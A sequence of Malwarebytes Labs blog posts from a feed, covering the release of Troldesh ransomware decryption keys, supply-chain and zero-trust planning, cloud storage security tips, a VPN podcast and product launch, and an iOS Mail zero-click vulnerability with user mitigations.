“We are the team which created a trojan-encryptor mostly known as Shade, Troldesh or Encoder.858. In fact, we stopped its distribution in the end of 2019. Now we made a decision to put the last point in this story and to publish all the decryption keys we have (over 750 thousands at all). We are also publishing our decryption soft; we also hope that, having the keys, antivirus companies will issue their own more user-friendly decryption tools. All other data related to our activity (including the source codes of the trojan) was irrevocably destroyed. We apologize to all the victims of the trojan and hope that the keys we published will help them to recover their data.”

Are these the real Troldesh decryption keys?

Yes. Since the statement and the keys were published the keys have been verified as our friends at Kaspersky have confirmed the validity of the keys and are working on a decryption tool. That tool will be added to the No More Ransom project.  The “No More Ransom” website is an initiative by the National High Tech Crime Unit of the Dutch police, Europol’s European Cybercrime Centre, Kaspersky and McAfee with the goal to help victims of ransomware retrieve their encrypted data without having to pay the criminals.

In the past, a few decryption tools for some of the Troldesh variants have already been published on the “No More Ransom” website. We will update this post when the Kaspersky decryptor is released and would like to warn against following the instructions on GitHub unless you are a very skilled user. The few extra days of waiting shouldn’t hurt that much and a failed attempt may render the files completely useless.

When is it useful to use the Troldesh decryption tool?

Before you go off and run this expected tool on your victimized computer as soon as it comes out, check if your encrypted files have one of these extensions:

  • xtbl
  • ytbl
  • breaking_bad
  • heisenberg
  • better_call_saul
  • los_pollos
  • da_vinci_code
  • magic_software_syndicate
  • windows10
  • windows8
  • no_more_ransom
  • tyson
  • crypted000007
  • crypted000078
  • rsa3072
  • decrypt_it
  • dexter
  • miami_california

If the file extensions from your affected system(s) do not match one on the list above, then your files are outside of the scope of this decryption tool. If you do find a match you should wait for the decryption tool to be published.

Why would this gang publish the Troldesh decryption keys?

The reason for all this is unknown and subject to speculation. We can imagine a few different reasons. From not very likely to credible.

  • Maybe their conscience caught up with them. After all they do apologize to the victims. But these are only the victims that didn’t pay or were unable to recover their files despite paying the ransom.
  • The Shade team may suspect that someone has breached their key vault and they were forced or decided on their own accord to publish the keys for that reason. But we have seen no claims to support that possibility.
  • The profitability of the ransomware had reached its limit. Ransom.Troldesh has been around since 2014 and we saw a steep detection spike once the threat actors ventured outside of Russian targets in February of 2019. But after that initial spike the number of detections gradually faded out. It was still active and generating money though.
Number of Malwarebytes detections of Ransom.Troldesh from July 2018 till April 2020
  • The development of this ransomware has reached its technical limit and the team will focus on a new software project. The team stated to have stopped distribution in the end of 2019, but failed to let on what they are currently working on.
What we know

All we know for sure is that the keys have been verified and a decryption tool is in the works. All the rest are speculations based on a statement made on GitHub by an account by the name of “shade-team” that joined GitHub on April 25th, just prior to the statement.

Victims can keep their eyes peeled for the release of the decryption tool. We’ll keep you posted.

Stay safe!

The post Threat actors release Troldesh decryption keys appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Switching from a “Just in Time” delivery system should include planning ahead

Tue, 04/28/2020 - 15:15

As it becomes clear that some things will never again be the same after the global coronavirus pandemic, it is time to prepare for the future. The cybersecurity implications of upcoming changes will be most noticeable in organizations that rely on security models like the software defined perimeter.

The software defined perimeter is a model closely related to the zero trust framework, in which users must authenticate themselves first before accessing any company-sensitive documents or on-site information. Connectivity in the software defined perimeter is based on the premise that each device and identity must be verified before being granted access to the network.

Below, we explore why unexpected demand spikes may force organizations to reconsider their “Just in Time” delivery networks. But remember, a switch from one system brings questions about any new one.

Just in time delivery

As an example of the changes we can expect, let’s assume that after the coronavirus pandemic, some organizations will transition away from the Just In Time (JIT) delivery system they used when their supply lines began diminishing.

Just In Time delivery systems provide goods as orders come in, allowing for a lean, at-need production process with little to no surplus. But as we’ve recently seen, these types of systems are vulnerable to sudden peaks in demand, as depleting supply chains have already hit several industries, with the most poignant victim being healthcare. Hospitals, clinics, and medical centers around the world have quickly run of masks, hand sanitizer, and ventilators in the months since COVID-19 struck.

Many stores, both brick-and-mortar and web shops, have already faced the same problem. Soon after China applied its regional quarantine, global supply chains took a hit, with some businesses impacted sooner than others. It makes a big difference whether your goods come per container or air freight in terms of how soon your line could dry up.

How we need a constant stream of goods

To western economies, a continuous flow of goods and components is of the utmost importance. We regard transport and logistics as vital infrastructure for compelling reasons. Many of our factories depend on components made on the other side of the globe, and consumers recently learned just how many of their daily products originate from Asia. It’s not just electronics, toys, and clothing being made elsewhere, but also a lot of car parts, tools, and condoms.

One way to solve this problem for the next lock-down (which is a possibility, depending on how local governments decide to “open up” their economies) is to decentralize the origin of products that we can’t afford to miss. But by market standards, goods are often produced wherever labor is cheapest, and spreading production would increase price. In some cases, consumers might be willing to pay a higher price for locally produced goods. In other cases, trade restrictions could drive up the price for goods produced abroad. In both cases, the supply lines would get shorter and gain stronger defenses to interruption.

Just in Time inventory management saves money by minimizing the necessary amount of storage room and by limiting goods going to waste because they go over the expiration date. What you need to realize is that you are not solving this problem, you are just moving it to your logistics partner, who may be better equipped to handle it as they probably do it for many others. And in turn they rely on other shipping and production companies to keep their stocks at a level which allows them to satisfy the needs of their customers.

Now that organizations have learned that a broken link in the supply chain can have drastic results for those at the end of the line, the question is whether this system can be used for every type of good, or whether we need to prioritize between essential goods and those we can afford to miss for a while.

Different software

Switching to another inventory system requires another type of software. Where JIT inventory management may be as simple as sending out an order to the logistics partner—whether it’s yours or the one of your supplier is not really relevant—keeping your own inventory requires a different approach. Countless goods have expiration dates, and not just food and drugs. Some other products also lose their usefulness over time. Others may even lose their value, or the cost to produce them may drop rapidly compared to other products.

Different software comes with a bunch of question, mainly related to security:

  • Who needs access?
  • What will be the permissions of the software itself?
  • How are we going to manage (remote) accessibility?
  • Do we anticipate any compliance issues?
  • How did the software perform during security testing?
  • What will be the procedure during transition?
  • How will this influence my software defined perimeter?

Most of the time, simple stock-keeping software should be less complicated than Just-In-Time inventory management, so it may be a good time to rethink some of the settings you have chosen while you were still using JIT. Even when you end up using a mix of both systems (as many organizations do) the time of change is typically a good time to reconsider choices made in the past. Nobody may have reviewed them because they simply worked. But that doesn’t necessarily mean that they were the optimal choices.

Most of the questions above speak for themselves but will need to be answered on a case by case basis.

Recommended reading: Explained: the strengths and weaknesses of the Zero Trust model

Software defined perimeter

As you may have expected, the software defined perimeter is a security model which is often used in combination with cloud-based software or when remote access to on-premise applications is needed. The software defined perimeter finds its base in the Zero Trust model and divides network access into small segments by establishing direct connections between users and the resources they access.

Logic dictates that when you switch from JIT to a more local inventory this will impact the software defined perimeter. In the JIT system you can expect outbound connections to be established that control the flow of needed goods into the organization. In a system based on local storage, you may see more requests from remote workers to check up on the state of the inventory.

If you this type of change will not affect your organization, there are many other changes that might be caused or ramped up by this crisis. So, it might be beneficial to try and plan ahead. A prepared organization doesn’t get caught by surprise.

Stay safe!

The post Switching from a “Just in Time” delivery system should include planning ahead appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cloud data protection: how to secure what you store in the cloud

Mon, 04/27/2020 - 18:05

The cloud has become the standard for data storage. Just a few years ago, individuals and businesses pondered whether or not they should move to the cloud. This is now a question of the past. Today, the question isn’t whether to adopt cloud storage but rather how.

Despite its rapid pace of adoption, there are some lingering concerns around cloud storage. Perhaps the most persistent issue is the matter of cloud data security. With as much critical data as there is stored on the cloud, and with a “nebulous” grasp on exactly how it’s stored and who has access, how can people be sure it’s safe?

Growing cloud usage

Cloud usage has exploded in recent years. Five years ago, global cloud traffic was at 3,851 exabytes, a number which has since skyrocketed to more than 16,000 exabytes. As the functionality and connectivity of the Internet grows, cloud traffic will likely increase with it.

People store a vast amount of information on the cloud. It’s not just businesses hosting IT operations or client data on these platforms anymore. Individuals use services like OneDrive, Google Drive, Dropbox, and iCloud to store everything from tax documents to family photos.

With all this data so easily accessible on the cloud, privacy and data protection become more prevalent concerns. Where exactly is the data going and who can see it? If someone can access all of their documents, pictures and contacts instantly from their phone, can hackers just as easily obtain this information? There are more than 1 billion cloud users today who, if they don’t already know, should be asking themselves these questions and learning how to keep their cloud data private and secure.

Securing cloud data

Cloud storage may seem like a security threat at first glance, but it can offer superior security over other methods for businesses. So, what about individuals? By taking the right steps towards careful cloud usage, people can be sure their data is safe.

Keep local backups

The first step in cloud data protection is locally backing up data. Storing things on the cloud offers greater convenience and utility, making it an ideal primary option, but it’s essential to back up important files. Having backups on a local storage device like a flash drive or server ensures files are safe in the event of a breach.

Use the cloud judiciously

Users should be mindful of what kinds of data they store on the cloud. As secure as modern cloud storage is, there’s no such thing as being too careful. Most files are fine to keep anywhere, but sensitive information like bank info or Social Security numbers are best left offline.

Use encryption

Encryption is one of the most helpful methods of securing any digitally stored data. By encrypting files before uploading them to the cloud, users can ensure that the files are safe even from their cloud provider. Some providers offer varying levels of encryption services, but third-party software provides another layer of protection.

Read the terms of service

Most people skip over the terms of service, but this can be a security risk. If someone agrees to terms they didn’t read, they could legally give their cloud service provider more rights over their data than they realize. It can seem like a tedious task, but reading user agreements highlights what a company can and can’t do with data on their platforms.

Use good password hygiene

One of the simplest ways to bolster cloud data security is by using a strong password. Hackers can crack 90 percent of passwords in a matter of seconds because the vast majority of people prefer easy-to-remember passwords over strong ones, and a disappointing number of people choose passwords like “123456” or “password” to protect their online info.

The advice here is simple: Create a unique, long password that includes special characters, numbers, and letters. On top of that, change your password every few months to better improve your security. Do not share your password via email or text, and do not use easily identifiable information in your password, like your birthdate or address.

Multi-factor authentication further secures the login process. Most cloud providers should have the option to turn on two-step verification so that users need more than just a password to access their data. This function ensures that even if a hacker cracks the password, they still can’t get into the server.

Protect yourself from cyberthreats

Antivirus programs are an essential part of all computer-based functions, including cloud storage. Some forms of malware like keyloggers can give hackers entry into protected systems without users realizing it. By using a cloud provider with built-in antivirus software, third-party antivirus software or both, users can ensure they’re safe from these threats.

Common security mistakes

Quite often, the most significant threat to cloud data protection is improper use. In the corporate sphere, more than 40 percent of data breaches are the result of employee errors. No matter how many safety features a system has, user mistakes can always jeopardize security.

One of the most common cloud security mistakes is poor password handling. People use weak or repeated passwords, don’t change them or even list passwords on unsecured online documents, putting their information at risk. Users can avoid this by using strong passwords and changing them periodically.

Data breaches are not as substantial a problem if there is no sensitive data at risk. To avoid essential or private information from leaking or being stolen, the most secure practice is to store these somewhere other than the cloud. People should use cloud storage for things they need to access frequently, but not for things like credit card numbers.

Finally, many people also fall victim to phishing or pharming scams. Users can easily avoid these by never clicking suspicious links or giving out personal information to an unknown source.

With robust security measures and a healthy dose of general internet safety guidelines, cloud storage can be as secure as any other option on the market.

The post Cloud data protection: how to secure what you store in the cloud appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Lock and Code S1Ep5: Mythbusting and understanding VPNs with JP Taggart

Mon, 04/27/2020 - 15:00

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to JP Taggart, senior security researcher at Malwarebytes, about VPNs—debunking their myths, explaining their actual capabilities, and providing some advice on what makes a strong VPN.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research on: Plus other cybersecurity news:
  • What a deal: details of 267 Million Facebook users for 500 Euros. (Source:
  • Smart IoT home hubs are vulnerable to remote code execution attacks. (Source: ZDNet)
  • Automated bots are increasingly scraping data and attempting logins. (Source: DarkReading)
  • A new Android trojan targets banking customers with overlay attacks. (Source: ThreatPost)
  • Severe vulnerability in OpenSSL allows DoS attacks. (Source: SecurityWeek)
  • Vivaldi adds built-in tracker and ad blocker to latest browser version. (Source: TechSpot)

Stay safe, everyone!

The post Lock and Code S1Ep5: Mythbusting and understanding VPNs with JP Taggart appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Introducing Malwarebytes Privacy

Thu, 04/23/2020 - 12:00

Here at Malwarebytes, we’re no strangers to using virtual private networks (VPNs) to protect our privacy while browsing online. Regular readers of our blog will remember that we’ve advised on VPN usage on many occasions, whether for mobile device users looking for anonymity or business owners wanting additional authentication protocols. We believe VPNs are an essential part of layered protection that users should deploy against threats to both devices and personal data.

One important note we consistently emphasize is that it’s important to choose a VPN that does what it promises and doesn’t abuse your data. To make that choice a little easier, we’ve developed our own VPN that Malwarebytes users can trust to protect your data and privacy every time you go online. To that end, we proudly present: Malwarebytes Privacy.

What is Malwarebytes Privacy?

Malwarebytes Privacy is a next-gen VPN that helps protect your privacy and your personal information when you go online. Our VPN secures your connection, keeping your online activity private and protected. All your traffic travels through an encrypted tunnel to our VPN servers, then onward to the website you are visiting. This way, websites see the VPN’s identity instead of yours. Any information that your ISP saves cannot be tied to you.

Most importantly, Malwarebytes Privacy does not collect user logs or telemetry data whatsoever. Your data remains private—even from us.

What makes Malwarebytes Privacy next gen?

If you have used other VPNs in the past, you may have experienced a serious slow-down of your Internet traffic. This is a logical consequence of tunneling through a remote server. But if you compare Malwarebytes Privacy to other VPNs, you will experience a smoother flow of traffic that is much faster than traditional VPNs.

Not only does Malwarebytes improve your Internet speed compared to other VPNs. It also:

  • Doesn’t slow down your computer
  • Shows less battery usage for portable devices
  • Uses best-in-class 256-bit AES encryption

As VPNs move from the workplace to the home, Malwarebytes Privacy uses the latest technology to give users better performance and privacy online.

Why use a VPN at all?

Every time you go online, corporations, advertisers, and hackers are trying to eavesdrop on you. In a world that is more connected that ever before, having a VPN is like having your own personal Internet connection. By using a VPN, you can change your Internet-facing IP to a location of your choice, masking your true server address and hiding your online activity from those who try to profit from it.

Malwarebytes Privacy streamlines this process down to a single click. Its intuitive interface shows the most important information about your Internet connection in an easy-to-read dashboard, such as:

  • Whether the VPN is on or off
  • Which server location is selected
  • Your actual IP address vs. the IP address being displayed
The Malwarebytes Privacy GUI

Using best-in-class encryption, Malwarebytes Privacy also helps protect your personal information from cybercriminals—without collecting any of your browsing or online activity data itself. As an added bonus, with over 180 servers in more than 30 countries, our VPN offers users the potential to view different, localized content around the Internet.

How to get Malwarebytes Privacy

The Malwarebytes Privacy user guide covers the basics of the program and can be found on our support pages. There you can find out how to download and install our VPN, activate the program, connect to a private server, and other functions. You can also configure program settings, check your account details, and seek in-app help.

For more information about Malwarebytes Privacy, take a look at our dedicated webpage for the VPN.

Stay safe and stay private, everyone!

The post Introducing Malwarebytes Privacy appeared first on Malwarebytes Labs.

Categories: Techie Feeds

iOS Mail bug allows remote zero-click attacks

Wed, 04/22/2020 - 17:54

On Monday, ZecOps released a report about a couple concerning vulnerabilities with the Mail app in iOS. These vulnerabilities would allow an attacker to execute arbitrary code in the Mail app or the maild process that assists the Mail app behind the scenes. Most concerning, though, is the fact that even the most current version of iOS, 13.4.1, is vulnerable.

The way the attack works is that the threat actor sends an email message designed to cause a buffer overflow in Mail (or maild). A buffer overflow is a bug in code that allows an attack to happen if the threat actor is able to fill a block of memory beyond its capacity. Essentially, the attacker writes garbage data that fills up the memory, then writes code that overwrites existing code in adjoining memory, which later gets executed by the vulnerable process.

The bad news

The vulnerabilities disclosed by ZecOps would allow an attacker to use such a buffer overflow to attack an iOS device remotely, on devices running iOS 6 through iOS 13.4.1. (ZecOps writes that it may work on even older versions of iOS, but they did not test that.)

On iOS 12, the attack requires nothing more than viewing a malicious email message in the Mail app. It would not require tapping a link or any other content within the message. On iOS 13, the situation is worse, as the attack can be carried out against the maild process in the background, without requiring any user interaction (ie, it is a “zero-click vulnerability”).

In the case of infection on iOS 13, there would be no significant sign of infection, other than temporary slowness of the Mail app. In some cases, evidence of a failed attack may be present in the form of messages that have no content and cannot be displayed.

The messages—shown in the image above from the ZecOps blog—may be visible for a limited time. Once an attack is successful, the attacker would presumably use access to the Mail app to delete these messages, so the user may never see them.

The good news

I know how this sounds. This is an attack that can be carried out by any threat actor who has your email address, on the latest version of iOS, and the infection happens in the background without requiring action from the user. How is there good news here?!

Fortunately, there is. The vulnerabilities revealed by ZecOps only allow an attack of the Mail app itself. Using those vulnerabilities, an attacker would be able to capture your email messages, as well as modify and delete messages. Presumably the attacker would also be able to conduct other normal Mail operations, such as sending messages from your email address, although this was not mentioned. While this isn’t exactly comforting, it falls far short of compromising the entire device.

In order to achieve a full device compromise, the attacker would need to have another vulnerability. This means that if you have version 13.4.1, it would require a publicly unknown vulnerability, which would for the most part restrict such an attack to a nation-state-level adversary.

In other words, someone would have to be willing to risk burning a zero-day vulnerability, worth potentially a million dollars or more, to infect your phone. This means that you’re unlikely to be infected unless some hostile government or other powerful group is interested in spying on you.

If you are, for example, a human rights advocate working against a repressive regime, or a member of an oppressed minority in such a country, you may be a target. Similarly, if you are a journalist covering such news, you may be a target. You could also be at risk if you are an important business person, such as a CEO or CFO at a major corporation, or hold an important role in the government. The average person will not be at significant risk from this kind of attack.

Why disclose now?

It is common practice as part of “responsible disclosure” to avoid public mention of a major vulnerability until after it has been fixed, or until sufficient time has passed that it is believed the software or hardware vendor does not intend to fix the vulnerability in a timely fashion. Release of this kind of information before a fix is available can lead to increased danger to users, as hackers who learn that a vulnerability exists can find it for themselves.

Of course, this must be balanced against the risk of existing attacks that are going undetected. Disclosure can help people who are under active attack to discover the problem, and can help people who are not yet under attack learn how to prevent an attack.

With this in mind, ZecOps mentioned three reasons why they chose to disclose now:

  1. Since the disclosed vulnerabilities can’t be used to compromise the entire device without additional vulnerabilities, the risk of disclosure is lower.
  2. Apple has released a beta of iOS 13.4.5, which addresses the issue. Although a fix in beta is not exactly the same as a fix in a public release, the changes in the beta could be analyzed by an attacker, which would lead to discovery of the vulnerabilities. Essentially, the vulnerabilities have been disclosed to malicious hackers already, but the public was unaware.
  3. At least six organizations were under active attack using these vulnerabilities. (The organizations were not named.)
What you should do

First, don’t panic. As mentioned, this is not a widespread attack against everyone using an iPhone. There have been other zero-click vulnerabilities used to push malware onto iPhones in the past, yet none have ever been widespread. This is because the more widespread such an attack becomes, the more likely it is to be spotted, and subsequently fixed by Apple.

To protect their investment in million-dollar iOS zero-day vulnerabilities, powerful organizations use those vulnerabilities sparingly, only against targeted individuals or groups. Thus, unless you’re someone who might be targeted by a hostile nation or other powerful organization, you’re not likely to be in danger.

However, the risk does increase following disclosure, as malicious hackers can discover and use the vulnerability to attack Mail, at least. So you shouldn’t ignore the risk, either.

As much as I’d like to say, “Install Malwarebytes, run a scan, and remove the malware,” I can’t. Unlike macOS, installing antivirus software isn’t possible on iOS, due to Apple restrictions. So there is no software that can scan an iPhone or iPad for malware.

This, plus the lack of noticeable symptoms, means that it will be difficult to determine whether you’ve been affected. As always with iOS, if you have reason to believe you’ve been infected, your only option is to reset your device to factory state and set it up again from scratch as if it were a new device.

As for precautions to avoid infection, there are a couple things you can do. One would be to install the iOS 13.4.5 beta, which contains a fix for the bug. This is not something that’s easy to do, however, as you need an Apple developer account to download the beta. Plus, using a beta version of iOS, which may have bugs, isn’t recommended for all users.

The other possible security measure would be to disable Mail until the next version of iOS is released publicly. To do so, open the Settings app and scroll down to Password & Accounts. Tap that, then look at the list of accounts.

You may have multiple accounts, as shown above, or only one. For any accounts that say “Mail” underneath, that means that you’re using Mail to download mail for that account. Tap on each account, and on the next screen, look for the Mail toggle.

The image above shows that Mail is enabled. Toggle the switch to off. Do this for each of your accounts, and do not switch Mail back on again until you’ve updated to a version of iOS newer than 13.4.1.

Stay safe, everyone!

The post iOS Mail bug allows remote zero-click attacks appeared first on Malwarebytes Labs.

Categories: Techie Feeds